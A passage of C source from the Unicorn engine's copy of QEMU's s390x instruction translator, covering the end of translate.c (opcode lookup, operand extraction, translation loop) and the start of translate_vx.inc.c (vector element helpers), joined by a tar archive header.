*tcg_ctx = s->uc->tcg_ctx; in2_ri2(s, o); tcg_gen_qemu_ld32u(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_mri2_32u 0 static void in2_mri2_64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; in2_ri2(s, o); tcg_gen_qemu_ld64(tcg_ctx, o->in2, o->in2, get_mem_index(s)); } #define SPEC_in2_mri2_64 0 static void in2_i2(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_const_i64(tcg_ctx, get_field(s, i2)); } #define SPEC_in2_i2 0 static void in2_i2_8u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_const_i64(tcg_ctx, (uint8_t)get_field(s, i2)); } #define SPEC_in2_i2_8u 0 static void in2_i2_16u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_const_i64(tcg_ctx, (uint16_t)get_field(s, i2)); } #define SPEC_in2_i2_16u 0 static void in2_i2_32u(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_const_i64(tcg_ctx, (uint32_t)get_field(s, i2)); } #define SPEC_in2_i2_32u 0 static void in2_i2_16u_shl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint64_t i2 = (uint16_t)get_field(s, i2); o->in2 = tcg_const_i64(tcg_ctx, i2 << s->insn->data); } #define SPEC_in2_i2_16u_shl 0 static void in2_i2_32u_shl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint64_t i2 = (uint32_t)get_field(s, i2); o->in2 = tcg_const_i64(tcg_ctx, i2 << s->insn->data); } #define SPEC_in2_i2_32u_shl 0 static void in2_insn(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in2 = tcg_const_i64(tcg_ctx, s->fields.raw_insn); } #define SPEC_in2_insn 0 /* ====================================================================== */ /* Find opc within the table of insns. This is formulated as a switch statement so that (1) we get compile-time notice of cut-paste errors for duplicated opcodes, and (2) the compiler generates the binary search tree, rather than us having to post-process the table. */ #define C(OPC, NM, FT, FC, I1, I2, P, W, OP, CC) \ E(OPC, NM, FT, FC, I1, I2, P, W, OP, CC, 0, 0) #define D(OPC, NM, FT, FC, I1, I2, P, W, OP, CC, D) \ E(OPC, NM, FT, FC, I1, I2, P, W, OP, CC, D, 0) #define F(OPC, NM, FT, FC, I1, I2, P, W, OP, CC, FL) \ E(OPC, NM, FT, FC, I1, I2, P, W, OP, CC, 0, FL) #define E(OPC, NM, FT, FC, I1, I2, P, W, OP, CC, D, FL) insn_ ## NM, enum DisasInsnEnum { #include "insn-data.def" }; #undef E #define E(OPC, NM, FT, FC, I1, I2, P, W, OP, CC, D, FL) { \ .opc = OPC, \ .flags = FL, \ .fmt = FMT_##FT, \ .fac = FAC_##FC, \ .spec = SPEC_in1_##I1 | SPEC_in2_##I2 | SPEC_prep_##P | SPEC_wout_##W, \ .name = #NM, \ .help_in1 = in1_##I1, \ .help_in2 = in2_##I2, \ .help_prep = prep_##P, \ .help_wout = wout_##W, \ .help_cout = cout_##CC, \ .help_op = op_##OP, \ .data = D \ }, /* Allow 0 to be used for NULL in the table below. */ #define in1_0 NULL #define in2_0 NULL #define prep_0 NULL #define wout_0 NULL #define cout_0 NULL #define op_0 NULL #define SPEC_in1_0 0 #define SPEC_in2_0 0 #define SPEC_prep_0 0 #define SPEC_wout_0 0 /* Give smaller names to the various facilities. */ #define FAC_Z S390_FEAT_ZARCH #define FAC_CASS S390_FEAT_COMPARE_AND_SWAP_AND_STORE #define FAC_DFP S390_FEAT_DFP #define FAC_DFPR S390_FEAT_FLOATING_POINT_SUPPPORT_ENH /* DFP-rounding */ #define FAC_DO S390_FEAT_STFLE_45 /* distinct-operands */ #define FAC_EE S390_FEAT_EXECUTE_EXT #define FAC_EI S390_FEAT_EXTENDED_IMMEDIATE #define FAC_FPE S390_FEAT_FLOATING_POINT_EXT #define FAC_FPSSH S390_FEAT_FLOATING_POINT_SUPPPORT_ENH /* FPS-sign-handling */ #define FAC_FPRGR S390_FEAT_FLOATING_POINT_SUPPPORT_ENH /* FPR-GR-transfer */ #define FAC_GIE S390_FEAT_GENERAL_INSTRUCTIONS_EXT #define FAC_HFP_MA S390_FEAT_HFP_MADDSUB #define FAC_HW S390_FEAT_STFLE_45 /* high-word */ #define FAC_IEEEE_SIM S390_FEAT_FLOATING_POINT_SUPPPORT_ENH /* IEEE-exception-simulation */ #define FAC_MIE S390_FEAT_STFLE_49 /* misc-instruction-extensions */ #define FAC_LAT S390_FEAT_STFLE_49 /* load-and-trap */ #define FAC_LOC S390_FEAT_STFLE_45 /* load/store on condition 1 */ #define FAC_LOC2 S390_FEAT_STFLE_53 /* load/store on condition 2 */ #define FAC_LD S390_FEAT_LONG_DISPLACEMENT #define FAC_PC S390_FEAT_STFLE_45 /* population count */ #define FAC_SCF S390_FEAT_STORE_CLOCK_FAST #define FAC_SFLE S390_FEAT_STFLE #define FAC_ILA S390_FEAT_STFLE_45 /* interlocked-access-facility 1 */ #define FAC_MVCOS S390_FEAT_MOVE_WITH_OPTIONAL_SPEC #define FAC_LPP S390_FEAT_SET_PROGRAM_PARAMETERS /* load-program-parameter */ #define FAC_DAT_ENH S390_FEAT_DAT_ENH #define FAC_E2 S390_FEAT_EXTENDED_TRANSLATION_2 #define FAC_EH S390_FEAT_STFLE_49 /* execution-hint */ #define FAC_PPA S390_FEAT_STFLE_49 /* processor-assist */ #define FAC_LZRB S390_FEAT_STFLE_53 /* load-and-zero-rightmost-byte */ #define FAC_ETF3 S390_FEAT_EXTENDED_TRANSLATION_3 #define FAC_MSA S390_FEAT_MSA /* message-security-assist facility */ #define FAC_MSA3 S390_FEAT_MSA_EXT_3 /* msa-extension-3 facility */ #define FAC_MSA4 S390_FEAT_MSA_EXT_4 /* msa-extension-4 facility */ #define FAC_MSA5 S390_FEAT_MSA_EXT_5 /* msa-extension-5 facility */ #define FAC_ECT S390_FEAT_EXTRACT_CPU_TIME #define FAC_PCI S390_FEAT_ZPCI /* z/PCI facility */ #define FAC_AIS S390_FEAT_ADAPTER_INT_SUPPRESSION #define FAC_V S390_FEAT_VECTOR /* vector facility */ #define FAC_VE S390_FEAT_VECTOR_ENH /* vector enhancements facility 1 */ static const DisasInsn insn_info[] = { #include "insn-data.def" }; #undef E #define E(OPC, NM, FT, FC, I1, I2, P, W, OP, CC, D, FL) \ case OPC: return &insn_info[insn_ ## NM]; static const DisasInsn *lookup_opc(uint16_t opc) { switch (opc) { #include "insn-data.def" default: return NULL; } } #undef F #undef E #undef D #undef C /* Extract a field from the insn. The INSN should be left-aligned in the uint64_t so that we can more easily utilize the big-bit-endian definitions we extract from the Principals of Operation. */ static void extract_field(DisasFields *o, const DisasField *f, uint64_t insn) { uint32_t r, m; if (f->size == 0) { return; } /* Zero extract the field from the insn. */ r = (insn << f->beg) >> (64 - f->size); /* Sign-extend, or un-swap the field as necessary. */ switch (f->type) { case 0: /* unsigned */ break; case 1: /* signed */ assert(f->size <= 32); m = 1u << (f->size - 1); r = (r ^ m) - m; break; case 2: /* dl+dh split, signed 20 bit. */ r = ((int8_t)r << 12) | (r >> 8); break; case 3: /* MSB stored in RXB */ g_assert(f->size == 4); switch (f->beg) { case 8: r |= extract64(insn, 63 - 36, 1) << 4; break; case 12: r |= extract64(insn, 63 - 37, 1) << 4; break; case 16: r |= extract64(insn, 63 - 38, 1) << 4; break; case 32: r |= extract64(insn, 63 - 39, 1) << 4; break; default: // g_assert_not_reached(); break; } break; default: abort(); } /* Validate that the "compressed" encoding we selected above is valid. I.e. we havn't make two different original fields overlap. */ assert(((o->presentC >> f->indexC) & 1) == 0); o->presentC |= 1 << f->indexC; o->presentO |= 1 << f->indexO; o->c[f->indexC] = r; } /* Lookup the insn at the current PC, extracting the operands into O and returning the info struct for the insn. Returns NULL for invalid insn. */ static const DisasInsn *extract_insn(CPUS390XState *env, DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint64_t insn, pc = s->base.pc_next; int op, op2, ilen; const DisasInsn *info; if (unlikely(s->ex_value)) { /* Drop the EX data now, so that it's clear on exception paths. */ TCGv_i64 zero = tcg_const_i64(tcg_ctx, 0); tcg_gen_st_i64(tcg_ctx, zero, tcg_ctx->cpu_env, offsetof(CPUS390XState, ex_value)); tcg_temp_free_i64(tcg_ctx, zero); /* Extract the values saved by EXECUTE. */ insn = s->ex_value & 0xffffffffffff0000ull; ilen = s->ex_value & 0xf; op = insn >> 56; } else { insn = ld_code2(env, pc); op = (insn >> 8) & 0xff; ilen = get_ilen(op); switch (ilen) { case 2: insn = insn << 48; break; case 4: insn = ld_code4(env, pc) << 32; break; case 6: insn = (insn << 48) | (ld_code4(env, pc + 2) << 16); break; default: // g_assert_not_reached(); break; } } s->pc_tmp = s->base.pc_next + ilen; s->ilen = ilen; /* We can't actually determine the insn format until we've looked up the full insn opcode. Which we can't do without locating the secondary opcode. Assume by default that OP2 is at bit 40; for those smaller insns that don't actually have a secondary opcode this will correctly result in OP2 = 0. */ switch (op) { case 0x01: /* E */ case 0x80: /* S */ case 0x82: /* S */ case 0x93: /* S */ case 0xb2: /* S, RRF, RRE, IE */ case 0xb3: /* RRE, RRD, RRF */ case 0xb9: /* RRE, RRF */ case 0xe5: /* SSE, SIL */ op2 = (insn << 8) >> 56; break; case 0xa5: /* RI */ case 0xa7: /* RI */ case 0xc0: /* RIL */ case 0xc2: /* RIL */ case 0xc4: /* RIL */ case 0xc6: /* RIL */ case 0xc8: /* SSF */ case 0xcc: /* RIL */ op2 = (insn << 12) >> 60; break; case 0xc5: /* MII */ case 0xc7: /* SMI */ case 0xd0: case 0xd1: case 0xd2: case 0xd3: case 0xd4: case 0xd5: case 0xd6: case 0xd7: case 0xd8: case 0xd9: case 0xda: case 0xdb: case 0xdc: case 0xdd: case 0xde: case 0xdf: // case 0xd0 ... 0xdf: /* SS */ case 0xe1: /* SS */ case 0xe2: /* SS */ case 0xe8: /* SS */ case 0xe9: /* SS */ case 0xea: /* SS */ case 0xee: case 0xef: case 0xf0: case 0xf1: case 0xf2: case 0xf3: // case 0xee ... 0xf3: /* SS */ case 0xf8: case 0xf9: case 0xfa: case 0xfb: case 0xfc: case 0xfd: // case 0xf8 ... 0xfd: /* SS */ op2 = 0; break; default: op2 = (insn << 40) >> 56; break; } memset(&s->fields, 0, sizeof(s->fields)); s->fields.raw_insn = insn; s->fields.op = op; s->fields.op2 = op2; /* Lookup the instruction. */ info = lookup_opc(op << 8 | op2); s->insn = info; /* If we found it, extract the operands. */ if (info != NULL) { DisasFormat fmt = info->fmt; int i; for (i = 0; i < NUM_C_FIELD; ++i) { extract_field(&s->fields, &format_info[fmt].op[i], insn); } } return info; } static bool is_afp_reg(int reg) { return reg % 2 || reg > 6; } static bool is_fp_pair(int reg) { /* 0,1,4,5,8,9,12,13: to exclude the others, check for single bit */ return !(reg & 0x2); } static DisasJumpType translate_one(CPUS390XState *env, DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const DisasInsn *insn; DisasJumpType ret = DISAS_NEXT; DisasOps o = { 0 }; /* Search for the insn in the table. */ insn = extract_insn(env, s); /* Emit insn_start now that we know the ILEN. */ tcg_gen_insn_start(tcg_ctx, s->base.pc_next, s->cc_op, s->ilen); // Unicorn: trace this instruction on request if (HOOK_EXISTS_BOUNDED(s->uc, UC_HOOK_CODE, s->base.pc_next)) { gen_uc_tracecode(tcg_ctx, s->ilen, UC_HOOK_CODE_IDX, s->uc, s->base.pc_next); // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } /* Not found means unimplemented/illegal opcode. */ if (insn == NULL) { // qemu_log_mask(LOG_UNIMP, "unimplemented opcode 0x%02x%02x\n", // s->fields.op, s->fields.op2); gen_illegal_opcode(s); return DISAS_NORETURN; } if (s->base.tb->flags & FLAG_MASK_PER) { TCGv_i64 addr = tcg_const_i64(tcg_ctx, s->base.pc_next); gen_helper_per_ifetch(tcg_ctx, tcg_ctx->cpu_env, addr); tcg_temp_free_i64(tcg_ctx, addr); } /* process flags */ if (insn->flags) { /* privileged instruction */ if ((s->base.tb->flags & FLAG_MASK_PSTATE) && (insn->flags & IF_PRIV)) { gen_program_exception(s, PGM_PRIVILEGED); return DISAS_NORETURN; } /* if AFP is not enabled, instructions and registers are forbidden */ if (!(s->base.tb->flags & FLAG_MASK_AFP)) { uint8_t dxc = 0; if ((insn->flags & IF_AFP1) && is_afp_reg(get_field(s, r1))) { dxc = 1; } if ((insn->flags & IF_AFP2) && is_afp_reg(get_field(s, r2))) { dxc = 1; } if ((insn->flags & IF_AFP3) && is_afp_reg(get_field(s, r3))) { dxc = 1; } if (insn->flags & IF_BFP) { dxc = 2; } if (insn->flags & IF_DFP) { dxc = 3; } if (insn->flags & IF_VEC) { dxc = 0xfe; } if (dxc) { gen_data_exception(tcg_ctx, dxc); return DISAS_NORETURN; } } /* if vector instructions not enabled, executing them is forbidden */ if (insn->flags & IF_VEC) { if (!((s->base.tb->flags & FLAG_MASK_VECTOR))) { gen_data_exception(tcg_ctx, 0xfe); return DISAS_NORETURN; } } } /* Check for insn specification exceptions. */ if (insn->spec) { if ((insn->spec & SPEC_r1_even && get_field(s, r1) & 1) || (insn->spec & SPEC_r2_even && get_field(s, r2) & 1) || (insn->spec & SPEC_r3_even && get_field(s, r3) & 1) || (insn->spec & SPEC_r1_f128 && !is_fp_pair(get_field(s, r1))) || (insn->spec & SPEC_r2_f128 && !is_fp_pair(get_field(s, r2)))) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } } /* Implement the instruction. */ if (insn->help_in1) { insn->help_in1(s, &o); } if (insn->help_in2) { insn->help_in2(s, &o); } if (insn->help_prep) { insn->help_prep(s, &o); } if (insn->help_op) { ret = insn->help_op(s, &o); } if (ret != DISAS_NORETURN) { if (insn->help_wout) { insn->help_wout(s, &o); } if (insn->help_cout) { insn->help_cout(s, &o); } } /* Free any temporaries created by the helpers. */ if (o.out && !o.g_out) { tcg_temp_free_i64(tcg_ctx, o.out); } if (o.out2 && !o.g_out2) { tcg_temp_free_i64(tcg_ctx, o.out2); } if (o.in1 && !o.g_in1) { tcg_temp_free_i64(tcg_ctx, o.in1); } if (o.in2 && !o.g_in2) { tcg_temp_free_i64(tcg_ctx, o.in2); } if (o.addr1) { tcg_temp_free_i64(tcg_ctx, o.addr1); } if (s->base.tb->flags & FLAG_MASK_PER) { /* An exception might be triggered, save PSW if not already done. */ if (ret == DISAS_NEXT || ret == DISAS_PC_STALE) { tcg_gen_movi_i64(tcg_ctx, tcg_ctx->psw_addr, s->pc_tmp); } /* Call the helper to check for a possible PER exception. */ gen_helper_per_check_exception(tcg_ctx, tcg_ctx->cpu_env); } /* Advance to the next instruction. */ s->base.pc_next = s->pc_tmp; return ret; } static void s390x_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cs) { DisasContext *dc = container_of(dcbase, DisasContext, base); struct uc_struct *uc = cs->uc; // unicorn handle dc->uc = uc; /* 31-bit mode */ if (!(dc->base.tb->flags & FLAG_MASK_64)) { dc->base.pc_first &= 0x7fffffff; dc->base.pc_next = dc->base.pc_first; } dc->cc_op = CC_OP_DYNAMIC; dc->ex_value = dc->base.tb->cs_base; dc->do_debug = dc->base.singlestep_enabled; } static void s390x_tr_tb_start(DisasContextBase *db, CPUState *cs) { } static void s390x_tr_insn_start(DisasContextBase *dcbase, CPUState *cs) { } static bool s390x_tr_breakpoint_check(DisasContextBase *dcbase, CPUState *cs, const CPUBreakpoint *bp) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; /* * Emit an insn_start to accompany the breakpoint exception. * The ILEN value is a dummy, since this does not result in * an s390x exception, but an internal qemu exception which * brings us back to interact with the gdbstub. */ tcg_gen_insn_start(tcg_ctx, dc->base.pc_next, dc->cc_op, 2); dc->base.is_jmp = DISAS_PC_STALE; dc->do_debug = true; /* The address covered by the breakpoint must be included in [tb->pc, tb->pc + tb->size) in order to for it to be properly cleared -- thus we increment the PC here so that the logic setting tb->size does the right thing. */ dc->base.pc_next += 2; return true; } static void s390x_tr_translate_insn(DisasContextBase *dcbase, CPUState *cs) { CPUS390XState *env = cs->env_ptr; DisasContext *dc = container_of(dcbase, DisasContext, base); // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(dc->uc, dcbase->pc_next)) { // imitate PGM exception to halt emulation dcbase->is_jmp = DISAS_UNICORN_HALT; } else { dc->base.is_jmp = translate_one(env, dc); if (dc->base.is_jmp == DISAS_NEXT) { uint64_t page_start; page_start = dc->base.pc_first & TARGET_PAGE_MASK; if (dc->base.pc_next - page_start >= TARGET_PAGE_SIZE || dc->ex_value) { dc->base.is_jmp = DISAS_TOO_MANY; } } } } static void s390x_tr_tb_stop(DisasContextBase *dcbase, CPUState *cs) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; switch (dc->base.is_jmp) { case DISAS_UNICORN_HALT: tcg_gen_insn_start(tcg_ctx, dc->base.pc_next, 0, 0); update_psw_addr(dc); update_cc_op(dc); gen_helper_uc_s390x_exit(tcg_ctx, tcg_ctx->cpu_env); break; case DISAS_GOTO_TB: case DISAS_NORETURN: break; case DISAS_TOO_MANY: case DISAS_PC_STALE: case DISAS_PC_STALE_NOCHAIN: update_psw_addr(dc); /* FALLTHRU */ case DISAS_PC_UPDATED: /* Next TB starts off with CC_OP_DYNAMIC, so make sure the cc op type is in env */ update_cc_op(dc); /* FALLTHRU */ case DISAS_PC_CC_UPDATED: /* Exit the TB, either by raising a debug exception or by return. */ if (dc->do_debug) { gen_exception(tcg_ctx, EXCP_DEBUG); } else if (use_exit_tb(dc) || dc->base.is_jmp == DISAS_PC_STALE_NOCHAIN) { tcg_gen_exit_tb(tcg_ctx, NULL, 0); } else { tcg_gen_lookup_and_goto_ptr(tcg_ctx); } break; default: // g_assert_not_reached(); break; } } static const TranslatorOps s390x_tr_ops = { .init_disas_context = s390x_tr_init_disas_context, .tb_start = s390x_tr_tb_start, .insn_start = s390x_tr_insn_start, .breakpoint_check = s390x_tr_breakpoint_check, .translate_insn = s390x_tr_translate_insn, .tb_stop = s390x_tr_tb_stop, }; void gen_intermediate_code(CPUState *cs, TranslationBlock *tb, int max_insns) { DisasContext dc; translator_loop(&s390x_tr_ops, &dc.base, cs, tb, max_insns); } void restore_state_to_opc(CPUS390XState *env, TranslationBlock *tb, target_ulong *data) { int cc_op = data[1]; env->psw.addr = data[0]; /* Update the CC opcode if it is not already up-to-date. */ if ((cc_op != CC_OP_DYNAMIC) && (cc_op != CC_OP_STATIC)) { env->cc_op = cc_op; } /* Record ILEN. */ env->int_pgm_ilen = data[2]; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/translate_vx.inc.c��������������������������������������������������0000664�0000000�0000000�00000265177�14675241067�0021777�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU TCG support -- s390x vector instruction translation functions * * Copyright (C) 2019 Red Hat Inc * * Authors: * David Hildenbrand <david@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ /* * For most instructions that use the same element size for reads and * writes, we can use real gvec vector expansion, which potantially uses * real host vector instructions. As they only work up to 64 bit elements, * 128 bit elements (vector is a single element) have to be handled * differently. Operations that are too complicated to encode via TCG ops * are handled via gvec ool (out-of-line) handlers. * * As soon as instructions use different element sizes for reads and writes * or access elements "out of their element scope" we expand them manually * in fancy loops, as gvec expansion does not deal with actual element * numbers and does also not support access to other elements. * * 128 bit elements: * As we only have i32/i64, such elements have to be loaded into two * i64 values and can then be processed e.g. by tcg_gen_add2_i64. * * Sizes: * On s390x, the operand size (oprsz) and the maximum size (maxsz) are * always 16 (128 bit). What gvec code calls "vece", s390x calls "es", * a.k.a. "element size". These values nicely map to MO_8 ... MO_64. Only * 128 bit element size has to be treated in a special way (MO_64 + 1). * We will use ES_* instead of MO_* for this reason in this file. * * CC handling: * As gvec ool-helpers can currently not return values (besides via * pointers like vectors or cpu_env), whenever we have to set the CC and * can't conclude the value from the result vector, we will directly * set it in "env->cc_op" and mark it as static via set_cc_static()". * Whenever this is done, the helper writes globals (cc_op). */ #define NUM_VEC_ELEMENT_BYTES(es) (1 << (es)) #define NUM_VEC_ELEMENTS(es) (16 / NUM_VEC_ELEMENT_BYTES(es)) #define NUM_VEC_ELEMENT_BITS(es) (NUM_VEC_ELEMENT_BYTES(es) * BITS_PER_BYTE) #define ES_8 MO_8 #define ES_16 MO_16 #define ES_32 MO_32 #define ES_64 MO_64 #define ES_128 4 /* Floating-Point Format */ #define FPF_SHORT 2 #define FPF_LONG 3 #define FPF_EXT 4 static inline bool valid_vec_element(uint8_t enr, MemOp es) { return !(enr & ~(NUM_VEC_ELEMENTS(es) - 1)); } static void read_vec_element_i64(TCGContext *tcg_ctx, TCGv_i64 dst, uint8_t reg, uint8_t enr, MemOp memop) { const int offs = vec_reg_offset(reg, enr, memop & MO_SIZE); switch (memop) { case ES_8: tcg_gen_ld8u_i64(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_16: tcg_gen_ld16u_i64(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_32: tcg_gen_ld32u_i64(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_8 | MO_SIGN: tcg_gen_ld8s_i64(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_16 | MO_SIGN: tcg_gen_ld16s_i64(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_32 | MO_SIGN: tcg_gen_ld32s_i64(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_64: case ES_64 | MO_SIGN: tcg_gen_ld_i64(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; default: g_assert_not_reached(); } } static void read_vec_element_i32(TCGContext *tcg_ctx, TCGv_i32 dst, uint8_t reg, uint8_t enr, MemOp memop) { const int offs = vec_reg_offset(reg, enr, memop & MO_SIZE); switch (memop) { case ES_8: tcg_gen_ld8u_i32(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_16: tcg_gen_ld16u_i32(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_8 | MO_SIGN: tcg_gen_ld8s_i32(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_16 | MO_SIGN: tcg_gen_ld16s_i32(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; case ES_32: case ES_32 | MO_SIGN: tcg_gen_ld_i32(tcg_ctx, dst, tcg_ctx->cpu_env, offs); break; default: // g_assert_not_reached(); break; } } static void write_vec_element_i64(TCGContext *tcg_ctx, TCGv_i64 src, int reg, uint8_t enr, MemOp memop) { const int offs = vec_reg_offset(reg, enr, memop & MO_SIZE); switch (memop) { case ES_8: tcg_gen_st8_i64(tcg_ctx, src, tcg_ctx->cpu_env, offs); break; case ES_16: tcg_gen_st16_i64(tcg_ctx, src, tcg_ctx->cpu_env, offs); break; case ES_32: tcg_gen_st32_i64(tcg_ctx, src, tcg_ctx->cpu_env, offs); break; case ES_64: tcg_gen_st_i64(tcg_ctx, src, tcg_ctx->cpu_env, offs); break; default: g_assert_not_reached(); } } static void write_vec_element_i32(TCGContext *tcg_ctx, TCGv_i32 src, int reg, uint8_t enr, MemOp memop) { const int offs = vec_reg_offset(reg, enr, memop & MO_SIZE); switch (memop) { case ES_8: tcg_gen_st8_i32(tcg_ctx, src, tcg_ctx->cpu_env, offs); break; case ES_16: tcg_gen_st16_i32(tcg_ctx, src, tcg_ctx->cpu_env, offs); break; case ES_32: tcg_gen_st_i32(tcg_ctx, src, tcg_ctx->cpu_env, offs); break; default: // g_assert_not_reached(); break; } } static void get_vec_element_ptr_i64(TCGContext *tcg_ctx, TCGv_ptr ptr, uint8_t reg, TCGv_i64 enr, uint8_t es) { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); /* mask off invalid parts from the element nr */ tcg_gen_andi_i64(tcg_ctx, tmp, enr, NUM_VEC_ELEMENTS(es) - 1); /* convert it to an element offset relative to cpu_env (vec_reg_offset() */ tcg_gen_shli_i64(tcg_ctx, tmp, tmp, es); #ifndef HOST_WORDS_BIGENDIAN tcg_gen_xori_i64(tcg_ctx, tmp, tmp, 8 - NUM_VEC_ELEMENT_BYTES(es)); #endif tcg_gen_addi_i64(tcg_ctx, tmp, tmp, vec_full_reg_offset(reg)); /* generate the final ptr by adding cpu_env */ tcg_gen_trunc_i64_ptr(tcg_ctx, ptr, tmp); tcg_gen_add_ptr(tcg_ctx, ptr, ptr, tcg_ctx->cpu_env); tcg_temp_free_i64(tcg_ctx, tmp); } #define gen_gvec_2(tcg_ctx, v1, v2, gen) \ tcg_gen_gvec_2(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ 16, 16, gen) #define gen_gvec_2s(tcg_ctx, v1, v2, c, gen) \ tcg_gen_gvec_2s(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ 16, 16, c, gen) #define gen_gvec_2_ool(tcg_ctx, v1, v2, data, fn) \ tcg_gen_gvec_2_ool(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ 16, 16, data, fn) #define gen_gvec_2i_ool(tcg_ctx, v1, v2, c, data, fn) \ tcg_gen_gvec_2i_ool(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ c, 16, 16, data, fn) #define gen_gvec_2_ptr(tcg_ctx, v1, v2, ptr, data, fn) \ tcg_gen_gvec_2_ptr(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ ptr, 16, 16, data, fn) #define gen_gvec_3(tcg_ctx, v1, v2, v3, gen) \ tcg_gen_gvec_3(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ vec_full_reg_offset(v3), 16, 16, gen) #define gen_gvec_3_ool(tcg_ctx, v1, v2, v3, data, fn) \ tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ vec_full_reg_offset(v3), 16, 16, data, fn) #define gen_gvec_3_ptr(tcg_ctx, v1, v2, v3, ptr, data, fn) \ tcg_gen_gvec_3_ptr(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ vec_full_reg_offset(v3), ptr, 16, 16, data, fn) #define gen_gvec_3i(tcg_ctx, v1, v2, v3, c, gen) \ tcg_gen_gvec_3i(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ vec_full_reg_offset(v3), 16, 16, c, gen) #define gen_gvec_4(tcg_ctx, v1, v2, v3, v4, gen) \ tcg_gen_gvec_4(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ vec_full_reg_offset(v3), vec_full_reg_offset(v4), \ 16, 16, gen) #define gen_gvec_4_ool(tcg_ctx, v1, v2, v3, v4, data, fn) \ tcg_gen_gvec_4_ool(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ vec_full_reg_offset(v3), vec_full_reg_offset(v4), \ 16, 16, data, fn) #define gen_gvec_4_ptr(tcg_ctx, v1, v2, v3, v4, ptr, data, fn) \ tcg_gen_gvec_4_ptr(tcg_ctx, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ vec_full_reg_offset(v3), vec_full_reg_offset(v4), \ ptr, 16, 16, data, fn) #define gen_gvec_dup_i64(tcg_ctx, es, v1, c) \ tcg_gen_gvec_dup_i64(tcg_ctx, es, vec_full_reg_offset(v1), 16, 16, c) #define gen_gvec_mov(tcg_ctx, v1, v2) \ tcg_gen_gvec_mov(tcg_ctx, 0, vec_full_reg_offset(v1), vec_full_reg_offset(v2), 16, \ 16) #define gen_gvec_dup64i(tcg_ctx, v1, c) \ tcg_gen_gvec_dup64i(tcg_ctx, vec_full_reg_offset(v1), 16, 16, c) #define gen_gvec_fn_2(tcg_ctx, fn, es, v1, v2) \ tcg_gen_gvec_##fn(tcg_ctx, es, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ 16, 16) #define gen_gvec_fn_2i(tcg_ctx, fn, es, v1, v2, c) \ tcg_gen_gvec_##fn(tcg_ctx, es, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ c, 16, 16) #define gen_gvec_fn_2s(tcg_ctx, fn, es, v1, v2, s) \ tcg_gen_gvec_##fn(tcg_ctx, es, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ s, 16, 16) #define gen_gvec_fn_3(tcg_ctx, fn, es, v1, v2, v3) \ tcg_gen_gvec_##fn(tcg_ctx, es, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ vec_full_reg_offset(v3), 16, 16) #define gen_gvec_fn_4(tcg_ctx, fn, es, v1, v2, v3, v4) \ tcg_gen_gvec_##fn(tcg_ctx, es, vec_full_reg_offset(v1), vec_full_reg_offset(v2), \ vec_full_reg_offset(v3), vec_full_reg_offset(v4), 16, 16) /* * Helper to carry out a 128 bit vector computation using 2 i64 values per * vector. */ typedef void (*gen_gvec128_3_i64_fn)(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 dh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh); static void 